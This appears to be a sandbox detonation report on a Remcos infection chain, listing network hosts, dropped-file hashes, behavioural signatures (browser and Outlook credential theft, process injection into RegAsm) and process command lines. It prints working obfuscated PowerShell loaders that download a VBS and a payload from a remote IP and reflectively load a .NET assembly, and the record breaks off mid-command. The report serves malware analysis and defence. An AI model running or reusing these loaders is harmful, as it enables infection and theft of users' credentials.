{ $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MKNS/02/741.901.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
Network
| Country | Destination | Domain | Proto |
| US | 192.3.109.147:80 | 192.3.109.147 | tcp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\yxua9fxg.cmdline
| MD5 | fca40b96b75cf53516080169d5805570 |
| SHA1 | 23ae999d5aba82f46a33e81b18fc4f97378f7ddb |
| SHA256 | aedd61689cc500298427330c75f2610e24fafb34aca223eceb326ae962200261 |
| SHA512 | 3093ebd4b04cbd523e9b22e7e77335a8d5c1e2d7d8590884bf11169f9907658cd96f8bb39dac6c8f602c1a97ed191c16852fce9c0c6c9079b65da9318cce60c2 |
\??\c:\Users\Admin\AppData\Local\Temp\yxua9fxg.0.cs
| MD5 | 4e9de40112f74a35c04e70ff765bd2d9 |
| SHA1 | e1b87ff8213b319bd6dc8a34c6753a0891b080c3 |
| SHA256 | 1f50f29e22249d0a44023ab9bf900cfb9749cb222541f6fe7b81a9eebc971dfc |
| SHA512 | bf910e45a2fa3fc6790dd7a3b930fd2b24964af2e3cbd049df1da73ad271967731c7b8a8f29d89d542071a80e0388c0e12130b24d606a55da955f838effa931e |
\??\c:\Users\Admin\AppData\Local\Temp\CSCBA4A.tmp
| MD5 | e1037e65e0f70f630fc5febcdd737396 |
| SHA1 | f2527aa22973710cebc26039cd93f11e29edebdc |
| SHA256 | 772d200545be556742f92f33ec8199b9eafeb71db37cb0edfa8afffb8f66bdd3 |
| SHA512 | ad314463fb830f1e89428314d6d1b512a409fe6989927fe3f1af38f389164bc75fa8b170e207e8039fc15386f69d2339c7f8dcd782b3c34a6145b5184d4e048d |
C:\Users\Admin\AppData\Local\Temp\RESBA4B.tmp
| MD5 | 62403f81170733fbe273650425fe0344 |
| SHA1 | be9f31a48bfbd21521fdccd50adc87b0b6cea56f |
| SHA256 | 124b7fab74c8d1c1be702dee8e07022e18526ba98e037b7650e9e725295c15ce |
| SHA512 | 91bf07a32bb9b7ad725590314c095a1526d67bb7a4a52971155231f56e353011e6a601768bc10eed566bfd4b9f5afa6c443a6e139bc36f51e613b5f8a150d11a |
C:\Users\Admin\AppData\Local\Temp\yxua9fxg.dll
| MD5 | f35ac81cb7e8b3dc43e3496c3280731d |
| SHA1 | 1944e69634b34a81bc1ada84ddbf61fa1d311b32 |
| SHA256 | 50fce1a5e4655f3a97bce81040e041d94353b1d2532b90aa35f9d3982978809c |
| SHA512 | e4f6a9993485a07d67de2b5e3cb6b6d0d6382546ce889810f1fde89c3940318d5eb861efc076d8eb9f1e00203a2a455c3bda615b8e1057900c0e8811d39fd6a4 |
C:\Users\Admin\AppData\Local\Temp\yxua9fxg.pdb
| MD5 | 95981cc296a689cbdb4bf8d23e17f722 |
| SHA1 | 43037d732984ab5ff4185c7a655a6dc21a6f4491 |
| SHA256 | c70410c64f75c92fbca4ba9f7dd6755d15eaf2329eace9e7c250a804f76e6b37 |
| SHA512 | 107b557944bbfe07aeb9e577f95575e0ef98c3ac818732e57c17aff3741954ab01f0077909b5bae5a8ff9093c7685f2da2601d915d1d368bbcf52a1cf8b27598 |
C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS
| MD5 | bbb5526e4329ba09ff5e50938cacf20f |
| SHA1 | 3ad1ef94e2ffbe311f3d9017c2f3781d00869951 |
| SHA256 | 700af46841a34b035ee7431fd07fe6bbd13651c58a704aed14df47cd74ce76ac |
| SHA512 | 5919fa788df8b2398078be672ea05a97fa273a4a0dceb8f96d5ba53b336567aeb7132a11ce99ecac7d763c1cb8ddfd2fefaf9607d74885b5927bcaf5de4b4d14 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | c7adcde7ad8cc6e2e52214a29c1c1981 |
| SHA1 | ebb987fd2bb0005cd066ddcbf2063d6436729e04 |
| SHA256 | 366b958f266073bb080a763e0b08afcd1e56845b6a0be3639a5e56c3a61a6e39 |
| SHA512 | 2d85b75697d57776a6b2e1c92dbca90bbc0b163308ec05e80341da2a706f5fa1e0036d97b9f369ebef0d066eba2155ab685a86211363461cf61da354c02cbeb6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 20:55
Reported
2024-08-06 20:57
Platform
win10v2004-20240802-en
Max time kernel
148s
Max time network
144s
Command Line
Signatures
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2720 set thread context of 1648 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1648 set thread context of 2160 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1648 set thread context of 4908 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1648 set thread context of 2448 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INETHTMLPAGE.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1gtdujx5\1gtdujx5.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD254.tmp" "c:\Users\Admin\AppData\Local\Temp\1gtdujx5\CSC753D5C0F1284F02B1C3A2396961AB97.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀c㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀LwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cgB2㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀dwBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bu㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀LgBj㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀cg㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YgBz㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀agBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀ZQBi㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bgB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB3㆛ ⺞ ⏬ ⦦ ⼀C0㆛ ⺞ ⏬ ⦦ ⼀TwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀VwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgB5㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀ew㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀dwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBE㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dwBu㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBh㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀R㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQ㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀aw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BX㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀aQB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LQBI㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBG㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀bw㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀bwB3㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bm㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀bwBt㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀t㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀ZwBy㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀QwBv㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀UgBl㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ 